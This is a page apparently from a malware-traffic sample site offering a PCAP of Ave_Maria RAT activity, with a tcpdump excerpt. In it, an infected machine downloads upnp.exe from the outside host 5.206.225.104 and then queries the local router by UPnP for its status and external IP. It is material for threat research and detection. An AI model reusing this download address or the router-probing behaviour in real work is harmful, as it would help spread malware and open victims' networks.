Text Example

Ave_Maria Malware RAT APT PCAP Download Traffic Sample upnp.exe 5.206.225.104

Download Attachments

  • 1 pcap upnp
    Date added: May 22, 2019 5:03 am Added by: admin File size: 169 KB Downloads: 73

2019-05-21 22:21:56.293446 IP 10.1.10.162.53185 > 5.206.225.104.80: Flags [P.], seq 1:428, ack 1, win 16425, length 427: HTTP: GET /dll/upnp.exe HTTP/1.1
E…`.@….O
.
….h…P9g…./’P.@)….GET /dll/upnp.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 5.206.225.104
Connection: Keep-Alive

2019-05-21 22:21:56.392855 IP 5.206.225.104.80 > 10.1.10.162.53185: Flags [.], ack 428, win 237, length 0

E .(..@.0.n….h

E..(a:@…p.
.
.
.
……….5.pP.@)……….
2019-05-21 22:22:11.202603 IP 10.1.10.162.53186 > 10.1.10.1.49153: Flags [P.], seq 1:142, ack 1, win 16425, length 141
E…a;@…pc
.
.
.
……….5.pP.@)….GET /IGDdevicedesc_brlan0.xml HTTP/1.1
Host: 10.1.10.1:49153
Connection: Close
User-Agent: MSWindows/6.1.7601, UPnP/1.1, MiniUPnPc/2.1

2019-05-21 22:22:11.213261 IP 10.1.10.162.53187 > 10.1.10.1.49153: Flags [P.], seq 1:583, ack 1, win 16425, length 582
E..naA@…n.
.
.
.
…..<..=.)..P.@).5..POST /upnp/control/WANIPConnection0 HTTP/1.1
Host: 10.1.10.1:49153
User-Agent: MSWindows/6.1.7601, UPnP/1.1, MiniUPnPc/2.1
Content-Length: 271
Content-Type: text/xml
SOAPAction: “urn:schemas-upnp-org:service:WANIPConnection:1#GetStatusInfo”
Connection: Close
Cache-Control: no-cache
Pragma: no-cache

E..(aF@…p.
.
.
.
…..,,.<..5.P.@).H…….. 2019-05-21 22:22:11.232070 IP 10.1.10.162.53188 > 10.1.10.1.49153: Flags [P.], seq 1:604, ack 1, win 16425, length 603
E…aG@…n.
.
.
.
…..,,.<..5.P.@).=..POST /upnp/control/WANIPConnection0 HTTP/1.1
Host: 10.1.10.1:49153
User-Agent: MSWindows/6.1.7601, UPnP/1.1, MiniUPnPc/2.1
Content-Length: 285
Content-Type: text/xml
SOAPAction: “urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress”
Connection: Close
Cache-Control: no-cache
Pragma: no-cache

Leave a Reply